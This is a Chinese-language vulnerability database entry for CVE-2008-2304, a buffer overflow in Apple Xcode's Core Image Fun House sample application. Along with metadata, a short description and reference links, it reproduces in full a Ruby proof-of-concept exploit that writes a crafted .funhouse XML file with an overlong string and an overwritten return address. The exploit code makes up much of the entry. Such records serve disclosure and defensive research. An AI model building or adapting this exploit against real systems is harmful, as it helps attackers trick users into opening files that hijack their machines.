Apple Xcode工具.funhouse文件XML数据处理缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115661 漏洞类型 缓冲区溢出
发布时间 2008-07-11 更新时间 2008-07-14
CVE编号 CVE-2008-2304 CNNVD-ID CNNVD-200807-216
漏洞平台 OSX CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/6043
https://www.securityfocus.com/bid/30189
https://cxsecurity.com/issue/WLB-2008070087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-216
|漏洞详情
Xcode是苹果机器上所使用的开发工具。Xcode工具中包含有名为CoreImageFunHouse的示例应用程序,用于处理带有.funhouse扩展名的内容。Funhouse应用没有正确地解析XML数据,如果用户受骗打开了特制的.funhouse文件的话,就可能触发缓冲区溢出
|漏洞EXP
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@netragard.com
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7:      'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
#        CFPropertyListCreateFromXMLData(): plist parse failed;
#        the data is notproper UTF-8. The file name for this data
#        could be:
$
#        /Users/test/Desktop/SuperTastey.funhouse/file.xml
#        The parser will retry as in 10.2, but the problem should be
#         corrected in the plist.
#
#  \x80-\xFF range that do not form proper utf8

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d  # There are lots of filtered chars!

if File.exist?(fname + ".funhouse/file.xml")
    File.unlink(fname + ".funhouse/file.xml")
    Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"

target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
~  f.print(FUNSTUFF)  # weeeeee... lets have fun.
~  f.close
} 

# milw0rm.com [2008-07-11]
|受影响的产品
Apple Xcode 2.4.1 Apple Xcode 2.3 Apple Xcode 2.2 Apple Xcode 2.1 Apple Xcode 2.0 Apple Core Image Fun House 0
|参考资料

来源:XF
名称:apple-xcode-funhouse-bo(43733)
链接:http://xforce.iss.net/xforce/xfdb/43733
来源:SECTRACK
名称:1020472
链接:http://www.securitytracker.com/id?1020472
来源:BID
名称:30189
链接:http://www.securityfocus.com/bid/30189
来源:BUGTRAQ
名称:20080711[NETRAGARDSECURITYADVISORY][AppleCoreImageFunHouse<=2.0OSX--ArbitraryCodeExecution][NETRAGARD-20080711]
链接:http://www.securityfocus.com/archive/1/archive/1/494230/100/0/threaded
来源:MILW0RM
名称:6043
链接:http://www.milw0rm.com/exploits/6043
来源:VUPEN
名称:ADV-2008-2093
链接:http://www.frsirt.com/english/advisories/2008/2093/references
来源:support.apple.com
链接:http://support.apple.com/kb/HT2352
来源:SREASON
名称:3988
链接:http://securityreason.com/securityalert/3988
来源:SECUNIA
名称:31060
链接:http://secunia.com/advisories/31060
来源:APPLE
名称:APPLE-SA-2008-07-11
链接:http://lists.apple.com/archives/security-announce//2008/Jul/msg00002.html